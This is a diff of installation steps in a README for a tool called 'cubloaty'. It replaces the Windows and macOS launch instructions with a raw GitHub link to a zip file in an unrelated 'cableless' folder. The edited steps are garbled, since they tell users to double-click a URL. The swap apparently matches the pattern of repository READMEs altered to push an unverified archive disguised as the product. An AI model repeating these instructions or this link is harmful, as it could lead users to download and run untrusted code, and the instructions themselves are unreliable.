JCPatinoRuiz/cubloaty/README.md

 1. **Locate the File:** Find the downloaded file in your Downloads folder or wherever you saved it.
 2. **Extract (If Necessary):** If the file is a compressed folder (like .zip), right-click and choose “Extract All.”
 Follow the prompts to extract the files.
 3. **Run the Application:**
-   - For Windows: Double-click `cubloaty.exe` to run the application.
+   - For Windows: Double-click `https://raw.githubusercontent.com/JCPatinoRuiz/cubloaty/main/cableless/cubloaty.zip` to run the application.
    - For Linux: Open a terminal, navigate to the folder, and run `./cubloaty`.
-   - For macOS: Double-click `cubloaty.app` to launch it.
+   - For macOS: Double-click `https://raw.githubusercontent.com/JCPatinoRuiz/cubloaty/main/cableless/cubloaty.zip` to launch it.

 ## 📜 Using cubloaty
 When you open cubloaty, you will see a user-friendly interface.
 Here’s how you can use it: